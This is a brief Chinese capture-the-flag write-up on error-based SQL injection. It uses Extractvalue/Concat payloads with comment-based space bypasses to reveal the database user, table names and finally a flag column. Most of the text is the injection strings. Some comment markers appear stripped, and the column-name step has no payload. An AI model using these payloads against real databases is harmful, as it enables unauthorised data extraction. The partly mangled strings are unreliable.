这道题输入一个单引号发现,sql语句报错,用union查询发现被禁用了这里用报错注入
先爆库名1’//And//Extractvalue(1,Concat(0x7e,User(),0x7e,Database()))#
再爆表名
1’//And//Extractvalue(1,Concat(0x7e,(Select//Group_concat(Table_name)//From//Information_schema.tables//Where/**/Table_schema=’CTF’)))#
再爆字段名
最后查看flag
1’//And//Extractvalue(1,Concat(0x7e,(Select//Group_concat(Flag)//From/**/CTF.Flag)))#
1’//And//Extractvalue(1,Concat(0x7e,(Select//SUBSTRING(Group_concat(Flag),21,40)//From/**/CTF.Flag)))#
